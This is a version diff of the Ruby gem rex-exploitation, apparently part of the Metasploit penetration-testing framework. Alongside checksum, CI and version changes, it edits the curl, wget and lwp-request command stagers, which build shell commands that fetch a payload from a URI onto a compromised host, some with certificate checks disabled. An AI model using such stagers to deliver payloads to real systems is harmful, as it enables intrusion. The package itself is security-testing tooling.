rex-exploitation 0.1.27 → 0.1.30

Sign up to get free protection for your applications and to get access to all the features.
Files changed (10) hide show
  1. checksums.yaml +4 -4
  2. checksums.yaml.gz.sig +0 -0
  3. data/.github/workflows/verify.yml +6 -16
  4. data/lib/rex/exploitation/cmdstager/curl.rb +4 -2
  5. data/lib/rex/exploitation/cmdstager/lwprequest.rb +5 -1
  6. data/lib/rex/exploitation/cmdstager/wget.rb +5 -2
  7. data/lib/rex/exploitation/version.rb +1 -1
  8. data.tar.gz.sig +0 -0
  9. metadata +2 -2
  10. metadata.gz.sig +1 -1
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: 6af3ee2c6b8d344941a8012d9db6e3eecb171fe86f455cf5691227903d829d36
4
- data.tar.gz: 461a8850613ec43afae0ebc895d4abae0dad33feb93cd53bf5058a949d3c621d
3
+ metadata.gz: 77bb3f87c3d9bebd080b5e257a82692a2ecc3901e5f376ac698b64d0e604cef7
4
+ data.tar.gz: 04c01acf31fc33e6da0a2b05ea65c3473f8705f240db084d580b5748d875de81
5
5
  SHA512:
6
- metadata.gz: 6e52334ebb63559fde83d3251f430ede4a5f301514f2be75653043c221ed57e0d6c0a34f17b950bc0a6b2f007b380dc21aff6e204cbce009dc5e4f6281913619
7
- data.tar.gz: 6f1ee703a95a8ad06f6e28ef208f6562e7231ec5ee973d9285bbbd36d12aedd2ce2cedaf846bdb87a2bb997b760f3e7a575a74e034dea0ffaf0946037856f247
6
+ metadata.gz: 338f50e19047283b98d3bce8fc511718c73b83977438a1d96eb669003b4d90a52a55fbc260ece6a69be28a6ed150ec721703d2c91914a3c36403f1a24861990b
7
+ data.tar.gz: 4b8871623b46e3542cf4ccdeab07e471b3d088f5808e3e1360fc37359739522112a463b918476c99ac865f6ad4704ed136e1f74861a7a4d39f9deab16df91370
checksums.yaml.gz.sig CHANGED
Binary file
data/.github/workflows/verify.yml CHANGED
@@ -10,7 +10,7 @@ on:
10
10
 
11
11
  jobs:
12
12
  test:
13
- runs-on: ubuntu-16.04
13
+ runs-on: ubuntu-18.04
14
14
  timeout-minutes: 40
15
15
 
16
16
  strategy:
@@ -20,6 +20,7 @@ jobs:
20
20
  - 2.6
21
21
  - 2.7
22
22
  - 3.0
23
+ - 3.1
23
24
  test_cmd:
24
25
  - bundle exec rspec
25
26
 
@@ -31,26 +32,15 @@ jobs:
31
32
  - name: Checkout code
32
33
  uses: actions/checkout@v2
33
34
 
34
- - uses: actions/setup-ruby@v1
35
+ - name: Setup Ruby
36
+ uses: ruby/setup-ruby@v1
35
37
  with:
36
38
  ruby-version: ${{ matrix.ruby }}
39
+ bundler-cache: true
37
40
 
38
- - name: Setup bundler
39
- run: |
40
- gem install bundler
41
- - uses: actions/cache@v2
42
- with:
43
- path: vendor/bundle
44
- key: ${{ runner.os }}-gems-${{ hashFiles('**/Gemfile.lock') }}
45
- restore-keys: |
46
- ${{ runner.os }}-gems-
47
- - name: Bundle install
48
- run: |
49
- bundle config path vendor/bundle
50
- bundle install --jobs 4 --retry 3
51
41
  - name: ${{ matrix.test_cmd }}
52
42
  run: |
53
43
  echo "${CMD}"
54
44
  bash -c "${CMD}"
55
45
  env:
56
- CMD: ${{ matrix.test_cmd }}
46
+ CMD: ${{ matrix.test_cmd }}
data/lib/rex/exploitation/cmdstager/curl.rb CHANGED
@@ -24,11 +24,13 @@ class Rex::Exploitation::CmdStagerCurl < Rex::Exploitation::CmdStagerBase
24
24
 
25
25
  def generate_cmds_payload(opts)
26
26
  cmds = []
27
+ uri = opts[:payload_uri]
27
28
 
28
29
  if opts[:ssl]
29
- cmds << "curl -kso #{@payload_path} #{opts[:payload_uri]}"
30
+ cmds << "curl -kso #{@payload_path} #{uri}"
30
31
  else
31
- cmds << "curl -so #{@payload_path} #{opts[:payload_uri]}"
32
+ uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
33
+ cmds << "curl -so #{@payload_path} #{uri}"
32
34
  end
33
35
 
34
36
  cmds
data/lib/rex/exploitation/cmdstager/lwprequest.rb CHANGED
@@ -23,7 +23,11 @@ class Rex::Exploitation::CmdStagerLwpRequest < Rex::Exploitation::CmdStagerBase
23
23
  end
24
24
 
25
25
  def generate_cmds_payload(opts)
26
- ["lwp-request -m GET #{opts[:payload_uri]} > #{@payload_path}"]
26
+ uri = opts[:payload_uri]
27
+ unless opts[:ssl]
28
+ uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
29
+ end
30
+ ["lwp-request -m GET #{uri} > #{@payload_path}"]
27
31
  end
28
32
 
29
33
  def generate_cmds_decoder(opts)
data/lib/rex/exploitation/cmdstager/wget.rb CHANGED
@@ -24,12 +24,15 @@ class Rex::Exploitation::CmdStagerWget < Rex::Exploitation::CmdStagerBase
24
24
 
25
25
  def generate_cmds_payload(opts)
26
26
  cmds = []
27
+
28
+ uri = opts[:payload_uri]
27
29
  ncc = '--no-check-certificate'
28
30
 
29
31
  if opts[:ssl]
30
- cmds << "wget -qO #{@payload_path} #{ncc} #{opts[:payload_uri]}"
32
+ cmds << "wget -qO #{@payload_path} #{ncc} #{uri}"
31
33
  else
32
- cmds << "wget -qO #{@payload_path} #{opts[:payload_uri]}"
34
+ uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
35
+ cmds << "wget -qO #{@payload_path} #{uri}"
33
36
  end
34
37
 
35
38
  cmds
data/lib/rex/exploitation/version.rb CHANGED
@@ -1,5 +1,5 @@
1
1
  module Rex
2
2
  module Exploitation
3
- VERSION = "0.1.27"
3
+ VERSION = "0.1.30"
4
4
  end
5
5
  end
data.tar.gz.sig CHANGED
Binary file
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: rex-exploitation
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.1.27
4
+ version: 0.1.30
5
5
  platform: ruby
6
6
  authors:
7
7
  - Metasploit Hackers
@@ -93,7 +93,7 @@ cert_chain:
93
93
  EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
94
94
  9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
95
95
  -----END CERTIFICATE-----
96
- date: 2021-02-11 00:00:00.000000000 Z
96
+ date: 2022-04-05 00:00:00.000000000 Z
97
97
  dependencies:
98
98
  - !ruby/object:Gem::Dependency
99
99
  name: rake
metadata.gz.sig CHANGED
@@ -1 +1 @@
1
- \:�
1
+ L���v&� T�]���_ �h &�iJ$�����6E5�c��~���'���d_���Y����Q���E��Xؒ_���m�NN7)Seނ<kQ�9�r�/��Pث�O���#����?#� �&����%jR\�v/x��V�"�2 �tGyɵ������Ѓ��h���^:7'#Xb>&4:��cY5L��/9i�M/���O�L�zoY�s���uN��уCv������f��c���